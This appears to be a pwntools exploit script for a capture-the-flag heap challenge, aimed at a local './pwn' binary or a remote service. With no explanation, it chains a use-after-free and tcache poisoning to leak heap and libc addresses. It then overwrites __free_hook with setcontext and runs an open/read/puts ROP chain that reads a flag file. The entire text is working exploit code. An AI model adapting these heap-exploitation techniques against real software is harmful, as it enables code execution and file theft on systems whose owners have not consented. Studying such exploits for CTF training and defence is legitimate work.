1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139
| from pwn import * import sys
context.arch='amd64'
flag=0 if flag: sh = remote('119.3.81.43', 49153) else: sh = process("./pwn")
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False) sa = lambda s,n : sh.sendafter(s,n) sla = lambda s,n : sh.sendlineafter(s,n) sl = lambda s : sh.sendline(s) sd = lambda s : sh.send(s) rc = lambda n : sh.recv(n) ru = lambda s : sh.recvuntil(s) ti = lambda : sh.interactive() leak = lambda name,addr :log.success(name+":"+hex(addr)) def menu(choice): sla(">>",str(choice)) def add(index,size): menu(1) sla('index:',str(index)) sla('input size:',str(size)) def edit(index,content): menu(3) sla('input index:',str(index)) sa('input context:',content) def dele(index): menu(2) sla('input index:',str(index)) def show(index): menu(4) sla('input index:',str(index))
add(0,0x50) add(1,0x50)
add(4,0x30) add(5,0x30)
dele(0) dele(1) show(1) tcache_head = u64(ru('\x55')[-6:].ljust(8,'\x00')) - 0xf30 leak('tcache_head',tcache_head)
sla(">>",'1'*0x420) target=tcache_head+0x750 leak('target',target)
edit(1,p64(target+0x10)+'\n') add(2,0x50) add(3,0x50) show(3) libc_base = u64(ru('\x7f')[-6:].ljust(8,'\x00')) -0x3ebcb0 leak('libc_base',libc_base) __free_hook = libc_base+libc.sym['__free_hook'] setcontext_35=libc_base+libc.sym['setcontext'] + 0x35
dele(4) dele(5) edit(5,p64(__free_hook)+'\n') add(6,0x30) add(7,0x30)
add(8,0x60) add(9,0x30) add(10,0x30)
pop_rdi=libc_base+0x00000000000215bf pop_rsi=libc_base+0x0000000000023eea pop_rdx=libc_base+0x0000000000001b96 flag_addr=tcache_head+0x780 orw_addr = tcache_head+0x780 orw_rop='flag'.ljust(0x10,'\x00') orw_rop += p64(pop_rdi) + p64(flag_addr) orw_rop += p64(pop_rsi) + p64(0) orw_rop += p64(libc_base+libc.sym['open']) orw_rop += p64(pop_rdi) + p64(3) orw_rop += p64(pop_rsi) + p64(tcache_head+0x440) orw_rop += p64(pop_rdx) + p64(0x50)
orw_rop += p64(libc_base+libc.sym['read']) orw_rop += p64(pop_rdi) + p64(tcache_head+0x440) orw_rop += p64(libc_base+libc.sym['puts']) print len(orw_rop) edit(8,orw_rop[:0x60]) orw_last = tcache_head+0x7e0
dele(9) dele(10) edit(10,p64(orw_last)+'\n') add(9,0x30) add(9,0x30) edit(9,orw_rop[0x60:])
add(0,0x40) add(0,0x40) edit(0,'\x00'*0x40) add(1,0x40) edit(1,'\x00'*0x40) add(1,0x40) edit(1,'\x00'*0x40)
chunk1=tcache_head + 0x1190 edit(0,p64(chunk1)+'\n') retn=libc_base+0x00000000000008aa edit(1,p64(orw_addr+0x10)+p64(retn)+'\n')
edit(7,p64(setcontext_35)+'\n')
leak('setcontext_35',setcontext_35) leak('orw_addr',orw_addr)
dele(0)
ti()
|